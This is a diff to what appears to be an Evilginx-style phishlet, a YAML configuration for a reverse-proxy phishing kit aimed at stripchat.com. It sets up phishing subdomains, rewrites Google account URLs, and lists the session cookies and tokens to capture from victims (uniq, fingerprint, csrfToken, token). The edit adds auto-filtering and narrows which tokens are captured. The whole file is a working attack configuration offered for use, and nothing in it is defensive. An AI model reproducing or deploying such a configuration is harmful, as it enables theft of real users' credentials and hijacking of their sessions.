--- a/stripchat.yaml
+++ b/stripchat.yaml
@@ -1,7 +1,7 @@
 author: '@cwaizydee'
 min_ver: '2.3.0'
 proxy_hosts:
-  - {phish_sub: 'sv', orig_sub: 'sv', domain: 'stripchat.com', session: true, is_landing: true}
+  - {phish_sub: 'sv', orig_sub: 'sv', domain: 'stripchat.com', session: true, is_landing: true, auto_filter: true}
  
   - {phish_sub: 'www', orig_sub: 'www', domain: 'stripchat.com', session: true, is_landing: false}
   
@@ -14,7 +14,7 @@ sub_filters:
   - {triggers_on: 'www.stripchat.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
 auth_tokens:
   - domain: 'sv.stripchat.com'
-    keys: ['uniq','fingerprint','csrfToken','token','.*,regexp']
+    keys: ['uniq','fingerprint','csrfToken','token']
 credentials:
   username:
     key: ''
